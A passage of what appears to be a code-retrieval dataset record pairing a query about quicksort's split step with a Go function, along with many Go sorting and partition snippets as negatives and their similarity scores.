4116, 4117, 4118, 4119, 4120, 4121, 4122, 4123, 4124, 4125, 4126, 4127, 4128, 4129, 4130, 4131, 4132, 4133, 4134, 4135, 4136, 4137, 4138, 4139, 4140, 4141, 4142, 4143, 4144, 4145, 4146, 4147, 4148, 4149, 4150, 4151, 4152, 4153, 4154, 4155, 4156, 4157, 4158, 4159, 4160, 4161, 4162, 4163, 4164, 4165, 4166, 4167, 4168, 4169, 4170, 4171, 4172, 4173, 4174, 4175, 4176, 4177, 4178, 4179, 4180, 4181, 4182, 4183, 4184, 4185, 4186, 4187, 4188, 4189, 4190, 4191, 4192, 4193, 4194, 4195, 4196, 4197, 4198, 4199, 4200, 4201, 4202, 4203, 4204, 4205, 4206, 4207, 4208, 4209, 4210, 4211, 4212, 4213, 4214, 4215, 4216, 4217, 4218, 4219, 4220, 4221, 4222, 4223, 4224, 4225, 4226, 4227, 4228, 4229, 4230, 4231, 4232, 4233, 4234, 4235, 4236, 4237, 4238, 4239, 4240, 4241, 4242, 4243, 4244, 4245, 4246, 4247, 4248, 4249, 4250, 4251, 4252, 4253, 4254, 4255, 4256, 4257, 4258, 4259, 4260, 4261, 4262, 4263, 4264, 4265, 4266, 4267, 4268, 4269, 4270, 4271, 4272, 4273, 4274, 4275, 4276, 4277, 4278, 4279, 4280, 4281, 4282, 4283, 4284, 4285, 4286, 4287, 4288, 4289, 4290, 4291, 4292, 4293, 4294, 4295, 4296, 4297, 4298, 4299, 4300, 4301, 4302, 4303, 4304, 4305, 4306, 4307, 4308, 4309, 4310, 4311, 4312, 4313, 4314, 4315, 4316, 4317, 4318, 4319, 4320, 4321, 4322, 4323, 4324, 4325, 4326, 4327, 4328, 4329, 4330, 4331, 4332, 4333, 4334, 4335, 4336, 4337, 4338, 4339, 4340, 4341, 4342, 4343, 4344, 4345, 4346, 4347, 4348, 4349, 4350, 4351, 4352, 4353, 4354, 4355, 4356, 4357, 4358, 4359, 4360, 4361, 4362, 4363, 4364, 4365, 4366, 4367, 4368, 4369, 4370, 4371, 4372, 4373, 4374, 4375, 4376, 4377, 4378, 4379, 4380, 4381, 4382, 4383, 4384, 4385, 4386, 4387, 4388, 4389, 4390, 4391, 4392, 4393, 4394, 4395, 4396, 4397, 4398, 4399, 4400, 4401, 4402, 4403, 4404, 4405, 4406, 4407, 4408, 4409, 4410, 4411, 4412, 4413, 4414, 4415, 4416, 4417, 4418, 4419, 4420, 4421, 4422, 4423, 4424, 4425, 4426, 4427, 4428, 4429, 4430, 4431, 4432, 4433, 4434, 4435, 4436, 4437, 4438, 4439, 4440, 4441, 4442, 4443, 4444, 4445, 4446, 4447, 4448, 4449, 4450, 4451, 4452, 4453, 4454, 4455, 4456, 4457, 4458, 4459, 4460, 4461, 4462, 4463, 4464, 4465, 4466, 4467, 4468, 4469, 4470, 4471, 4472, 4473, 4474, 4475, 4476, 4477, 4478, 4479, 4480, 4481, 4482, 4483, 4484, 4485, 4486, 4487, 4488, 4489, 4490, 4491, 4492, 4493, 4494, 4495, 4496, 4497, 4498, 4499, 4500, 4501, 4502, 4503, 4504, 4505, 4506, 4507, 4508, 4509, 4510, 4511, 4512, 4513, 4514, 4515, 4516, 4517, 4518, 4519, 4520, 4521, 4522, 4523, 4524, 4525, 4526, 4527, 4528, 4529, 4530, 4531, 4532, 4533, 4534, 4535, 4536, 4537, 4538, 4539, 4540, 4541, 4542, 4543, 4544, 4545, 4546, 4547, 4548, 4549, 4550, 4551, 4552, 4553, 4554, 4555, 4556, 4557, 4558, 4559, 4560, 4561, 4562, 4563, 4564, 4565, 4566, 4567, 4568, 4569, 4570, 4571, 4572, 4573, 4574, 4575, 4576, 4577, 4578, 4579, 4580, 4581, 4582, 4583, 4584, 4585, 4586, 4587, 4588, 4589, 4590, 4591, 4592, 4593, 4594, 4595, 4596, 4597, 4598, 4599, 4600, 4601, 4602, 4603, 4604, 4605, 4606, 4607, 4608, 4609, 4610, 4611, 4612, 4613, 4614, 4615, 4616, 4617, 4618, 4619, 4620, 4621, 4622, 4623, 4624, 4625, 4626, 4627, 4628, 4629, 4630, 4631, 4632, 4633, 4634, 4635, 4636, 4637, 4638, 4639, 4640, 4641, 4642, 4643, 4644, 4645, 4646, 4647, 4648, 4649, 4650, 4651, 4652, 4653, 4654, 4655, 4656, 4657, 4658, 4659, 4660, 4661, 4662, 4663, 4664, 4665, 4666, 4667, 4668, 4669, 4670, 4671, 4672, 4673, 4674, 4675, 4676, 4677, 4678, 4679, 4680, 4681, 4682, 4683, 4684, 4685, 4686, 4687, 4688, 4689, 4690, 4691, 4692, 4693, 4694, 4695, 4696, 4697, 4698, 4699, 4700, 4701, 4702, 4703, 4704, 4705, 4706, 4707, 4708, 4709, 4710, 4711, 4712, 4713, 4714, 4715, 4716, 4717, 4718, 4719, 4720, 4721, 4722, 4723, 4724, 4725, 4726, 4727, 4728, 4729, 4730, 4731, 4732, 4733, 4734, 4735, 4736, 4737, 4738, 4739, 4740, 4741, 4742, 4743, 4744, 4745, 4746, 4747, 4748, 4749, 4750, 4751, 4752, 4753, 4754, 4755, 4756, 4757, 4758, 4759, 4760, 4761, 4762, 4763, 4764, 4765, 4766, 4767, 4768, 4769, 4770, 4771, 4772, 4773, 4774, 4775, 4776, 4777, 4778, 4779, 4780, 4781, 4782, 4783, 4784, 4785, 4786, 4787, 4788, 4789, 4790, 4791, 4792, 4793, 4794, 4795, 4796, 4797, 4798, 4799, 4800, 4801, 4802, 4803, 4804, 4805, 4806, 4807, 4808, 4809, 4810, 4811, 4812, 4813, 4814, 4815, 4816, 4817, 4818, 4819, 4820, 4821, 4822, 4823, 4824, 4825, 4826, 4827, 4828, 4829, 4830, 4831, 4832, 4833, 4834, 4835, 4836, 4837, 4838, 4839, 4840, 4841, 4842, 4843, 4844, 4845, 4846, 4847, 4848, 4849, 4850, 4851, 4852, 4853, 4854, 4855, 4856, 4857, 4858, 4859, 4860, 4861, 4862, 4863, 4864, 4865, 4866, 4867, 4868, 4869, 4870, 4871, 4872, 4873, 4874, 4875, 4876, 4877, 4878, 4879, 4880, 4881, 4882, 4883, 4884, 4885, 4886, 4887, 4888, 4889, 4890, 4891, 4892, 4893, 4894, 4895, 4896, 4897, 4898, 4899, 4900, 4901, 4902, 4903, 4904, 4905, 4906, 4907, 4908, 4909, 4910, 4911, 4912, 4913, 4914, 4915, 4916, 4917, 4918, 4919, 4920, 4921, 4922, 4923, 4924, 4925, 4926, 4927, 4928, 4929, 4930, 4931, 4932, 4933, 4934, 4935, 4936, 4937, 4938, 4939, 4940, 4941, 4942, 4943, 4944, 4945, 4946, 4947, 4948, 4949, 4950, 4951, 4952, 4953, 4954, 4955, 4956, 4957, 4958, 4959, 4960, 4961, 4962, 4963, 4964, 4965, 4966, 4967, 4968, 4969, 4970, 4971, 4972, 4973, 4974, 4975, 4976, 4977, 4978, 4979, 4980, 4981, 4982, 4983, 4984, 4985, 4986, 4987, 4988, 4989, 4990, 4991, 4992, 4993, 4994, 4995, 4996, 4997, 4998, 4999}\n\n\tQuickSortInt(&data, 0, dataSize-1)\n}", "func Partition(InpArr []int, low, high int) int {\n\n\tif high - low < 1 {\n\t\tfmt.Println(\"array length less than 2. Either incorrect input or end of recursion\")\n\t}\n\n\tvar pivot = InpArr[low]\n\tvar i = low\n\tvar j = high\n\n\tfor i < j {\n\t\tfor{\n\t\t\ti++\n\t\t\tif (InpArr[i] > pivot) || (i == len(InpArr)-1) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\n\t\tfor InpArr[j] > pivot{\n\t\t\tj--\n\t\t}\n\t\tif i < j{\n\t\t\ttemp := InpArr[i]\n\t\t\tInpArr[i] = InpArr[j]\n\t\t\tInpArr[j] = temp\n\t\t}\n\n\t}\n\ttemp := InpArr[low]\n\tInpArr[low] = InpArr[j]\n\tInpArr[j] = temp\n\treturn j\n}", "func partition(x []int) int {\n\tif len(x) > 1 {\n\t\tpivot := x[0]\n\t\ti := 1\n\n\t\tfor j := i; j < len(x); j++ {\n\t\t\tif x[j] < pivot {\n\t\t\t\ttemp := x[j]\n\t\t\t\tx[j] = x[i]\n\t\t\t\tx[i] = temp\n\t\t\t\ti++\n\t\t\t}\n\t\t}\n\n\t\t// Place the pivot at correct position.\n\t\ttemp := x[i-1]\n\t\tx[i-1] = pivot\n\t\tx[0] = temp\n\n\t\treturn i - 1\n\t}\n\treturn 0\n}", "func partitionHoare(data []int) int {\n\thi := len(data) - 1\n\tpivot := data[hi/2]\n\ti := -1\n\tj := hi + 1\n\tfor {\n\t\ti++\n\t\tfor data[i] < pivot {\n\t\t\ti++\n\t\t}\n\t\tj--\n\t\tfor data[j] > pivot {\n\t\t\tj--\n\t\t}\n\t\tif i >= j {\n\t\t\treturn j\n\t\t}\n\t\tdata[i], data[j] = data[j], data[i]\n\t}\n}", "func getMedianPivot(data []int, left, right, groupSize int) int {\n\tfor {\n\t\tsize := right - left\n\n\t\tif size < groupSize {\n\t\t\treturn partitionN(data, left, right, groupSize)\n\t\t}\n\n\t\t// index is increased by a group size\n\t\tfor index := left; index < right; index += groupSize {\n\t\t\tsubRight := index + groupSize\n\n\t\t\t// check boundary\n\t\t\tif subRight > right {\n\t\t\t\tsubRight = right\n\t\t\t}\n\n\t\t\t// get median\n\t\t\tmedian := partitionN(data, index, subRight, groupSize)\n\n\t\t\t// move each median to the front of container\n\t\t\tdata[median], data[left+(index-left)/groupSize] =\n\t\t\t\tdata[left+(index-left)/groupSize], data[median]\n\t\t}\n\n\t\t// update the end of medians\n\t\tright = left + (right-left)/groupSize\n\t}\n}", "func partitionLumuto(data []int) int {\n\thi := len(data) - 1\n\tpivot := data[hi]\n\ti := 0\n\tfor j := 0; j <= hi; j++ {\n\t\tif data[j] < pivot {\n\t\t\tdata[i], data[j] = data[j], data[i]\n\t\t\ti++\n\t\t}\n\t}\n\tdata[i], data[hi] = data[hi], data[i]\n\treturn i\n}", "func TestParallelQuickSort(t *testing.T) {\n\tol := generateTestOrdersList(10000)\n\n\tSort(ol)\n\n\tcn := 0\n\n\tfor _, o := range ol {\n\t\tif cn > o.CustomerNo {\n\t\t\tt.Errorf(\"Customer No %v in wrong order!\", o.CustomerNo)\n\n\t\t\tcn = o.CustomerNo\n\t\t} else {\n\t\t\tcn = o.CustomerNo\n\t\t}\n\t}\n}", "func partition2(nums []int, l, r int) (int, int) {\n\tif l > r {\n\t\treturn -1, -1\n\t}\n\tif l == r {\n\t\treturn l, r\n\t}\n\tvar less, more, index = l, r, l\n\tfor index < more {\n\t\tif nums[index] == nums[r] {\n\t\t\tindex++\n\t\t} else if nums[index] < nums[r] {\n\t\t\tnums[index], nums[less] = nums[less], nums[index]\n\t\t\tless++\n\t\t\tindex++\n\t\t} else {\n\t\t\tmore--\n\t\t\tnums[index], nums[more] = nums[more], nums[index]\n\t\t}\n\t}\n\tnums[more], nums[r] = nums[r], nums[more]\n\treturn less, more\n}", "func partitionItems(array []float64, first, last int, r *rand.Rand) int {\n\tpivot := first + r.Intn(last-first-1)\n\tarray[first], array[pivot] = array[pivot], array[first]\n\n\tj := first + 1\n\tfor i := first + 1; i < last; i++ {\n\t\tif array[i] < array[first] {\n\t\t\tarray[j], array[i] = array[i], array[j]\n\t\t\tj++\n\t\t}\n\t}\n\tarray[j-1], array[first] = array[first], array[j-1]\n\treturn j - 1\n}", "func MinHeapSort(array []int) {\r\n\tvar n int = len(array)\r\n\tMakeMinHeap(array)\r\n\r\n\tfor i := n - 1; i >= 1; i-- {\r\n\t\tarray[0], array[i] = array[i], array[0]\r\n\t\tMinHeapFixdown(array, 0, i)\r\n\t}\r\n}", "func main() {\n\tfmt.Println(\"Selection sort\")\n\tarr := []int{64, 25, 12, 22, 11}\n\tfmt.Println(\"arr to sorted: \", arr)\n\t//SelectionSort(arr)\n\tn := len(arr)\n\tfmt.Println(n)\n\tselectionsort(arr)\n\tfmt.Println(\"arr to sorted: \", arr)\n}" ]
[ "0.7434971", "0.7427814", "0.71793103", "0.7163517", "0.71632874", "0.7137938", "0.71337104", "0.70999765", "0.70314693", "0.7029114", "0.7027174", "0.7010988", "0.70097184", "0.7002579", "0.6967433", "0.6962324", "0.6962127", "0.69464695", "0.6884501", "0.6869758", "0.68635637", "0.6822178", "0.6779831", "0.67765033", "0.6763613", "0.6734621", "0.67175287", "0.66949064", "0.66824627", "0.6677256", "0.66538364", "0.6653385", "0.66459095", "0.66453546", "0.662539", "0.6625186", "0.66216856", "0.65821165", "0.6579407", "0.65644574", "0.6564193", "0.65389526", "0.65250474", "0.65236944", "0.65167314", "0.6503024", "0.6475519", "0.64422864", "0.64177233", "0.6387242", "0.63117653", "0.62999547", "0.629481", "0.6275976", "0.62473327", "0.6243621", "0.6243615", "0.62077045", "0.61861783", "0.6185483", "0.6161033", "0.61463237", "0.61380374", "0.6132268", "0.61259717", "0.61201656", "0.6110885", "0.6093858", "0.60916513", "0.60797346", "0.60525006", "0.60503733", "0.6021849", "0.5991955", "0.5925725", "0.5923811", "0.5911897", "0.5875395", "0.585813", "0.5855718", "0.5839034", "0.5805553", "0.577904", "0.5756904", "0.5754526", "0.5742269", "0.57295823", "0.57122713", "0.57101846", "0.5696399", "0.56860125", "0.5662331", "0.56618345", "0.56576437", "0.56548125", "0.56415284", "0.5620994", "0.5604682", "0.5602149", "0.5596758" ]
0.6535588
42
/ the split part of algorithm of quicksort
func (idx *IndexBuf)split(s, t int) int { var i, j int for i, j = s, s; i < t; i++ { if idx.less(i, t) { idx.swap(i, j) j++ } } idx.swap(j, t) return j }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (s *quicksort) partition(slice []int, low, high int) int {\n\tpivotIdx := s.FindPivotIndex(slice, low, high)\n\n\tpivot := slice[pivotIdx]\n\ti := low\n\tj := high\n\n\tfor {\n\t\tfor ; slice[i] < pivot; i++ {\n\n\t\t}\n\t\tfor ; slice[j] > pivot; j-- {\n\n\t\t}\n\t\tif i >= j {\n\t\t\treturn j\n\t\t}\n\t\t// Do swap\n\t\ttemp := slice[i]\n\t\tslice[i] = slice[j]\n\t\tslice[j] = temp\n\t}\n}", "func qsort(a []int, start, end int) {\n\tif start >= end {\n\t\treturn\n\t}\n\tif end >= len(a) {\n\t\tend = len(a) - 1\n\t}\n\tpivot := a[(start+end)/2]\n\n\ti := start\n\tj := end\n\tfor {\n\t\tfor ; i <= end && a[i] < pivot; i++ {\n\t\t}\n\t\tfor ; j >= start && a[j] > pivot; j-- {\n\t\t}\n\t\tif i >= j {\n\t\t\tbreak\n\t\t}\n\t\ta[i], a[j] = a[j], a[i]\n\t\ti++\n\t\tj--\n\t}\n\tqsort(a, start, i-1)\n\tqsort(a, j+1, end)\n}", "func quicksort(result []models.CabInfo, leftIndex int, rightIndex int) {\n\n\tif leftIndex >= rightIndex {\n\t\treturn\n\t}\n\tpivot := result[rightIndex].Distance\n\n\tcnt := leftIndex\n\n\tfor i := leftIndex; i <= rightIndex; i++ {\n\n\t\tif result[i].Distance <= pivot {\n\t\t\tswap(&result[cnt], &result[i])\n\t\t\tcnt++\n\t\t}\n\t}\n\tquicksort(result, leftIndex, cnt-2)\n\tquicksort(result, cnt, rightIndex)\n}", "func qsort_inner(a []float64, b []int) ([]float64, []int) {\r\n\tif len(a) < 2 {\r\n\t\treturn a, b\r\n\t}\r\n\r\n\tleft, right := 0, len(a)-1\r\n\r\n\t// Pick a pivot\r\n\tpivotIndex := rand.Int() % len(a)\r\n\r\n\t// Move the pivot to the right\r\n\ta[pivotIndex], a[right] = a[right], a[pivotIndex]\r\n\tb[pivotIndex], b[right] = b[right], b[pivotIndex]\r\n\r\n\t// Pile elements smaller than the pivot on the left\r\n\tfor i := range a {\r\n\t\tif a[i] < a[right] {\r\n\t\t\ta[i], a[left] = a[left], a[i]\r\n\t\t\tb[i], b[left] = b[left], b[i]\r\n\t\t\tleft++\r\n\t\t}\r\n\t}\r\n\t// Place the pivot after the last smaller element\r\n\ta[left], a[right] = a[right], a[left]\r\n\tb[left], b[right] = b[right], b[left]\r\n\r\n\t// Go down the rabbit hole\r\n\tqsort_inner(a[:left], b[:left])\r\n\tqsort_inner(a[left+1:], b[left+1:])\r\n\r\n\treturn a, b\r\n}", "func quickSort(data QuickSorter, left, right int, wg *sync.WaitGroup) {\n\tdefer func() {\n\t\tif wg != nil {\n\t\t\twg.Done()\n\t\t}\n\t}()\n\n\tif left < right {\n\t\tp := partition(data, left, right)\n\n\t\tvar wait sync.WaitGroup\n\t\twait.Add(2)\n\t\tgo quickSort(data, left, p, &wait)\n\t\tgo quickSort(data, p+1, right, &wait)\n\t\twait.Wait()\n\t}\n}", "func partition(a []int, start, end int) int {\n pivot := a[end-1]\n i := start - 1\n for j := start; j < end-1; j++ {\n if a[j] < pivot {\n i++\n a[i], a[j] = a[j], a[i]\n }\n }\n a[i+1], a[end-1] = a[end-1], a[i+1]\n return i+1\n}", "func partition(slc []int, low int, high int) int {\n\n\n\tpivot := slc[high]\n\ti := low - 1 // index of smaller element\n\n\tfor j := low; j < high; j++ {\n\t\t// If current element is smaller than or\n\t\t// equal to pivot\n\t\tif slc[j] <= pivot {\n\t\t\ti++\n\n\t\t\t// swap arr[i] and arr[j]\n\t\t\ttemp := slc[i]\n\t\t\tslc[i] = slc[j]\n\t\t\tslc[j] = temp\n\t\t}\n\t}\n\n\t// swap arr[i+1] and arr[high] (or pivot)\n\ttemp := slc[i + 1]\n\tslc[i + 1] = slc[high]\n\tslc[high] = temp\n\n\treturn i + 1\n}", "func qsortImpl(a []int, start, end int) {\n if end - start > 1 {\n q := randomPartition(a, start, end)\n qsortImpl(a, start, q)\n qsortImpl(a, q+1, end)\n }\n}", "func quick(data []int, lo, hi int) {\n\n\tif hi-lo < 1 {\n\t\treturn\n\t}\n\tif hi-lo == 1 {\n\t\tif data[lo] > data[hi] {\n\t\t\tdata[lo], data[hi] = data[hi], data[lo]\n\t\t\treturn\n\t\t}\n\t\treturn\n\t}\n\n\tpivot := data[lo]\n\n\ta, b := lo+1, hi\n\n\tfor a <= b {\n\t\tif data[a] <= pivot {\n\t\t\tdata[a], data[a-1] = data[a-1], data[a]\n\t\t\ta++\n\t\t} else {\n\t\t\tdata[b], data[a] = data[a], data[b]\n\t\t\tb--\n\t\t}\n\t}\n\tif lo < b-1 {\n\t\tquick(data, lo, b-1)\n\t}\n\tif a < hi {\n\t\tquick(data, a, hi)\n\t}\n}", "func QSort(list []int, n int) {\n\tif n <= 1 {\n\t\treturn\n\t}\n\n\tpivot := list[0]\n\thead, tail := 0, n-1\n\n\tfor i := 1; i <= tail; {\n\t\tif list[i] > pivot {\n\t\t\tlist[i], list[tail] = list[tail], list[i]\n\t\t\ttail--\n\t\t} else {\n\t\t\tlist[i], list[head] = list[head], list[i]\n\t\t\thead++\n\t\t\ti++\n\t\t}\n\t}\n\n\tfrontPart := list[:head]\n\tlatterPart := list[head+1:]\n\n\tQSort(frontPart, len(frontPart))\n\tQSort(latterPart, len(latterPart))\n}", "func sort(slc []int, low int, high int) {\n\n\tvar pi int\n\n\tif (low < high) {\n\n\t\t/* pi is partitioning index, arr[pi] is\n \t\tnow at right place */\n\t\tpi = partition(slc, low, high)\n\n\t\t// Recursively sort elements before\n\t\t// partition and after partition\n\t\tgo sort(slc, low, pi-1)\n\t\tgo sort(slc, pi+1, high)\n\t}\n}", "func qsort(a []*resultData) []*resultData {\n\tif len(a) < 2 {\n\t\treturn a\n\t}\n\n\tleft, right := 0, len(a)-1\n\n\t// Pick a pivot\n\tpivotIndex := rand.Int() % len(a)\n\n\t// Move the pivot to the right\n\ta[pivotIndex], a[right] = a[right], a[pivotIndex]\n\n\t// Pile elements smaller than the pivot on the left\n\tfor i := range a {\n\t\tif a[i].Date > a[right].Date {\n\t\t\ta[i], a[left] = a[left], a[i]\n\t\t\tleft++\n\t\t}\n\t}\n\n\t// Place the pivot after the last smaller element\n\ta[left], a[right] = a[right], a[left]\n\n\t// Go down the rabbit hole\n\tqsort(a[:left])\n\tqsort(a[left+1:])\n\n\treturn a\n}", "func quickSort(a []int, length int) {\n\tif length < 2 {\n\t\treturn\n\t}\n\tmax := 0\n\tfor i := 0; i < length; i++ {\n\t\tif a[max] <= a[i] {\n\t\t\tmax = i\n\t\t}\n\t}\n\ta[length-1], a[max] = a[max], a[length-1]\n\tquickSort(a, length-1)\n}", "func QuickSort(a []int, lo, hi int) {\n\tif lo >= hi {\n\t\treturn\n\t}\n\n\tvar j = partition(a, lo, hi)\n\tQuickSort(a, lo, j)\n\tQuickSort(a, j+1, hi)\n}", "func partition(nums []int, start int, end int) int {\n\tfmt.Println(\"-00000-\")\n\tpivot := nums[start]\n\tfmt.Println(\"pivot\", pivot)\n\tleft := start + 1\n\tright := end\n\tfmt.Println(\"left\", left)\n\tfmt.Println(\"right\", right)\n\n\tfor left <= right {\n\t\tfor left <= right && nums[left] <= pivot {\n\t\t\tfmt.Println(\"nums[left]\", nums[left])\n\t\t\tfmt.Println(\"left before\", left)\n\t\t\tfmt.Println(\"NUMS\", nums)\n\t\t\tleft++\n\t\t\tfmt.Println(\"left\", left)\n\t\t\tfmt.Println(\"-LLLLLLL-\")\n\t\t}\n\t\tfor left <= right && nums[right] > pivot {\n\t\t\tfmt.Println(\"nums[right]\", nums[right])\n\t\t\tfmt.Println(\"right\", right)\n\t\t\tfmt.Println(\"NUMS\", nums)\n\t\t\tright--\n\t\t\tfmt.Println(\"right\", right)\n\t\t\tfmt.Println(\"-RRRRR-\")\n\t\t}\n\t\tfmt.Println(\"-FFFFF-\")\n\t\tfmt.Println(\"left\", left)\n\t\tfmt.Println(\"right\", right)\n\t\tfmt.Println(\"NUMS\", nums)\n\t\tif left <= right {\n\t\t\tfmt.Println(\"<<<<\", nums)\n\t\t\tnums[left], nums[right] = nums[right], nums[left]\n\t\t}\n\t\tfmt.Println(\"NUMS\", nums)\n\t}\n\tfmt.Println(\"SWITCHING\", nums)\n\tnums[right], nums[start] = nums[start], nums[right]\n\tfmt.Println(\"NUMS\", nums)\n\treturn right\n}", "func partition(arr []int, lo int, hi int) int {\n\ti := lo + 1\n\tj := hi\n\tpivot := arr[lo]\n\tfor {\n\t\tfor arr[i] < pivot {\n\t\t\tif i == hi {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\ti++\n\t\t}\n\t\tfor pivot < arr[j] {\n\t\t\tif j == lo {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tj--\n\t\t}\n\t\tif i >= j {\n\t\t\tbreak\n\t\t}\n\t\tarr[i], arr[j] = arr[j], arr[i]\n\t}\n\tarr[lo], arr[j] = arr[j], arr[lo]\n\treturn j\n}", "func qsort(l []int) {\n\tn := len(l)\n\tif n < 2 {\n\t\treturn\n\t}\n\tpos := 0\n\tpiv := &l[n-1]\n\tfor i := range l {\n\t\tif l[i] < *piv {\n\t\t\tl[i], l[pos] = l[pos], l[i]\n\t\t\tpos++\n\t\t}\n\t}\n\tl[pos], *piv = *piv, l[pos]\n\tqsort(l[:pos])\n\tqsort(l[pos+1:])\n}", "func partition(data []int, left, right, pivotIndex int) int {\n\tpivotValue := data[pivotIndex]\n\n\t// move pivot to end\n\tdata[pivotIndex], data[right] = data[right], data[pivotIndex]\n\n\t// partition\n\tlowindex := left\n\tfor highIndex := left; highIndex < right; highIndex++ {\n\t\tif data[highIndex] < pivotValue {\n\t\t\tdata[highIndex], data[lowindex] = data[lowindex], data[highIndex]\n\t\t\tlowindex++\n\t\t}\n\t}\n\n\t// move pivot to its final place\n\tdata[lowindex], data[right] = data[right], data[lowindex]\n\n\treturn lowindex\n}", "func QuickSort(pairs []Pair) []Pair {\n\tif len(pairs) < 2 {\n\t\treturn pairs\n\t}\n\tleft, right := 0, len(pairs)-1\n\tpivot := rand.Int() % len(pairs)\n\tpairs[pivot], pairs[right] = pairs[right], pairs[pivot]\n\tfor i := range pairs {\n\t\tif pairs[i].distance < pairs[right].distance {\n\t\t\tpairs[left], pairs[i] = pairs[i], pairs[left]\n\t\t\tleft++\n\t\t}\n\t}\n\tpairs[left], pairs[right] = pairs[right], pairs[left]\n\tQuickSort(pairs[:left])\n\tQuickSort(pairs[left+1:])\n\treturn pairs\n}", "func quicksort(ar []int, p, q int, increasing bool) {\n\tif p < q {\n\t\tg := rand.Intn(q) //Using a random no. as pivot\n\t\tfor ; g < p; g = rand.Intn(q) {\n\t\t} //g is the random index in [p,q)\n\t\tswap(ar, g, q-1) //Swaping pivot from last element in array\n\t\tx := partition(ar, p, q, increasing)\n\t\tquicksort(ar, p, x, increasing)\n\t\tquicksort(ar, x+1, q, increasing)\n\n\t}\n}", "func qsort(s []int, quit chan int, get_p_index func([]int) int) {\n\tif len(s) <= 1 {\n\t\tquit <- 0\n\t\treturn\n\t}\n\tvar p_index int\n\tif get_p_index == nil {\n\t\tp_index = (len(s) - 1) / 2\n\t} else {\n\t\tp_index = get_p_index(s)\n\t}\n\n\tl := partition(s, p_index)\n\n\tq := make(chan int)\n\tgo qsort(s[:l], q, get_p_index)\n\tgo qsort(s[l+1:], q, get_p_index)\n\t<-q\n\t<-q\n\tquit <- 0\n}", "func QuickSort(array []int) {\n\t//TODO: implement this\n}", "func (idx *IndexBuf)quickSort(s, t int) {\n if t < 0 {return}\n m := idx.split(s, t)\n for s > t {\n idx.quickSort(s, m-1)\n idx.quickSort(m+1, t)\n }\n}", "func QuickSort(InpArr []int, low, high int) {\n\tif low < high {\n\t\tj := Partition(InpArr, low, high)\n\t\tQuickSort(InpArr, low, j)\n\t\tQuickSort(InpArr, j+1, high)\n\t}\n}", "func partitionHoare(list []int, left, right, pivotIndex int) int {\n\tpivot := list[pivotIndex]\n\n\tfor i, j := left-1, right+1; ; {\n\n\t\t// Find leftmost element greater than or equal to pivot\n\t\ti++\n\t\tfor list[i] < pivot {\n\t\t\ti++\n\t\t}\n\n\t\t// Find rightmost element less than or equal to pivot\n\t\tj--\n\t\tfor list[j] > pivot {\n\t\t\tj--\n\t\t}\n\n\t\t// If pointers meet\n\t\tif i >= j {\n\t\t\treturn j\n\t\t}\n\n\t\t// Swap the values at each pointer\n\t\tlist[i], list[j] = list[j], list[i]\n\t}\n}", "func QuickSort(list []int, n int) {\n\tif n <= 1 {\n\t\treturn\n\t}\n\n\tseparateSort(list, 0, n-1)\n}", "func quickSelectAdaptive(data sort.Interface, k, a, b int) {\n\tvar (\n\t\tl int // |A| from the paper\n\t\tp int // pivot position\n\t)\n\tfor {\n\t\tl = b - a\n\t\tr := float64(k) / float64(l) // r <- real(k) / real(|A|)\n\t\tif l < 12 {\n\t\t\tp = hoarePartition(data, a+l/2, a, b) // HoarePartition(A, |A| / 2)\n\t\t} else if r < 7.0/16.0 {\n\t\t\tif r < 1.0/12.0 {\n\t\t\t\tp = repeatedStepFarLeft(data, k, a, b)\n\t\t\t} else {\n\t\t\t\tp = repeatedStepLeft(data, k, a, b)\n\t\t\t}\n\t\t} else if r >= 1.0-7.0/16.0 {\n\t\t\tif r >= 1.0-1.0/12.0 {\n\t\t\t\tp = repeatedStepFarRight(data, k, a, b)\n\t\t\t} else {\n\t\t\t\tp = repeatedStepRight(data, k, a, b)\n\t\t\t}\n\t\t} else {\n\t\t\tp = repeatedStepImproved(data, k, a, b)\n\t\t}\n\t\tif p == k {\n\t\t\treturn\n\t\t}\n\t\tif p > k {\n\t\t\tb = p // A <- A[0:p]\n\t\t} else {\n\t\t\t// i <- k - p - 1 // TODO what is i?\n\t\t\ta = p + 1 // A <- A[p+1:|A|]\n\t\t}\n\t}\n}", "func Quicksort(a []int) []int {\n\tif len(a) <= 1 {\n\t\treturn a\n\t}\n\n\tleftIndex, rightIndex := 0, len(a)-1\n\n\tpivotPoint := len(a) / 2\n\n\ta[pivotPoint], a[rightIndex] = a[rightIndex], a[pivotPoint]\n\n\tfor i := range a {\n\t\tif a[i] < a[rightIndex] {\n\t\t\ta[leftIndex], a[i] = a[i], a[leftIndex]\n\t\t\tleftIndex++\n\t\t}\n\t}\n\ta[leftIndex], a[rightIndex] = a[rightIndex], a[leftIndex]\n\n\tQuicksort(a[:leftIndex])\n\tQuicksort(a[leftIndex+1:])\n\n\treturn a\n}", "func partition(a []int, low, high int) int {\n\ti := low - 1\n\tpivot := a[high]\n\tfor j := low; j < high; j++ {\n\t\tif a[j] <= pivot {\n\t\t\ti++\n\t\t\ta[i], a[j] = a[j], a[i]\n\t\t}\n\t\ta[i+1], a[high] = a[high], a[i+1]\n\t}\n\treturn i + 1\n}", "func Quicksort(A su.Interface) su.Interface {\n\tB := A\n\n\tn := A.Len()\n\tquicksort(B, 0, n-1)\n\n\t// for left, right := 0, B.Len()-1; left < right; left, right = left+1, right-1 {\n\t// \tB.Swap(left, right)\n\t// }\n\treturn B\n}", "func quickPartition(input []int) ([]int, int) {\n\tleft := 0\n\tright := len(input) - 1\n\n\treturn quickPartitionHelper(input, left, right)\n}", "func QuickSort(list []int) {\n\tif len(list) <= 1 {\n\t\treturn\n\t}\n\n\tleft := 0\n\tright := len(list) - 1\n\tmid := list[0]\n\n\tfor left < right {\n\t\tfor list[right] > mid && left < right {\n\t\t\tright--\n\t\t}\n\n\t\tif left < right {\n\t\t\tlist[left] = list[right]\n\t\t\tleft++\n\t\t}\n\n\t\tfor list[left] < mid && left < right {\n\t\t\tleft++\n\t\t}\n\n\t\tif left < right {\n\t\t\tlist[right] = list[left]\n\t\t\tright--\n\t\t}\n\t}\n\n\tlist[left] = mid\n\n\tQuickSort(list[:left])\n\tQuickSort(list[left+1:])\n}", "func partition1(objs sort.Interface, l, r int) int {\n\tif l > r {\n\t\treturn -1\n\t}\n\tif l == r {\n\t\treturn l\n\t}\n\tvar lessEqual, index = l, l\n\tfor index < r {\n\t\tif objs.Less(index, r) == true 